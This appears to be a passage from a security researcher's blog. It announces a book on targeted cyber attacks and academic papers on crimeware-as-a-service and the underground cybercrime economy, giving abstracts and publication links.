- Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part two : https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2
Tuesday, April 15, 2014
Targeted Cyber Attacks Book - Syngress !
Update: A very insightful review of the book published in Network Security.
I started sketching this book about a year ago when I was invited by Syngress for this project based on my previous work on crimeware research. Thanks to the Syngress and Elsevier team for this step. Due to my ongoing job and commitments, the project got delayed but eventually the book is about to be published on 18th April. The first edition of the book is dedicated to the readers who are interested in understanding the artifacts of targeted cyber-attacks and associated components. Personally, I would like to thank all the researchers and journalists who reviewed the book and provided positive feedback.
Introduction: Cyber-crime increasingly impacts both the online and offline world, and targeted attacks play a significant role in disrupting services in both. Targeted attacks are those that are aimed at a particular individual, group, or type of site or service. Unlike worms and viruses that usually attack indiscriminately, targeted attacks involve intelligence-gathering and planning to a degree that drastically changes its profile.
Individuals, corporations, and even governments are facing new threats from targeted attacks. Targeted Cyber Attacks examines real-world examples of directed attacks and provides insight into what techniques and resources are used to stage these attacks so that you can counter them more effectively.
The book is available to be ordered at following places:
- Amazon: http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048
- Kindle Edition: http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY
- Elsevier: http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/
- Barnes and Noble: http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047
Enjoy !
Wednesday, February 13, 2013
IEEE Security and Privacy Magazine - Targeted Cyber Attacks Paper
Our paper on targeted attacks is out in IEEE Security and Privacy Magazine.
"Targeted cyber attacks play an increasingly significant role in disrupting the online social and economic model, not to mention the threat they pose to nation-states. A variety of components and techniques come together to bring about such attacks"
Refer here: http://www.computer.org/csdl/mags/sp/2013/01/msp2013010054-abs.html
Enjoy !
Wednesday, February 6, 2013
Elsevier IJCIP - Crimeware-as-a-service – A survey of commoditized crimeware in the underground market
Our paper on Crimeware-as-a-Service (CaaS) has been accepted for publication in Elsevier's Journal of Critical Infrastructure Protection and is available at http://www.sciencedirect.com/science/article/pii/S1874548213000036.
Abstract: Crimeware-as-a-Service (CaaS) has become a prominent component of the underground economy. CaaS provides a new dimension to cyber crime by making it more organized, automated, and accessible to criminals with limited technical skills. This paper dissects CaaS and explains the essence of the underground economy that has grown around it. The paper also describes the various crimeware services that are provided in the underground market.
Wednesday, January 30, 2013
IEEE Internet Computing - Dissecting the State of Underground Enterprise
Our paper on "Dissecting the State of Underground Enterprise" is finally out in IEEE Internet Computing.
Abstract: "Cybercrime's tentacles reach deeply into the Internet. A complete, underground criminal economy has developed that lets malicious actors steal money through the Web. The authors detail this enterprise, showing how information, expertise, and money flow through it. Understanding the underground economy's structure is critical for fighting it."
It's available here: http://www.computer.org/csdl/mags/ic/2013/01/mic2013010060-abs.html.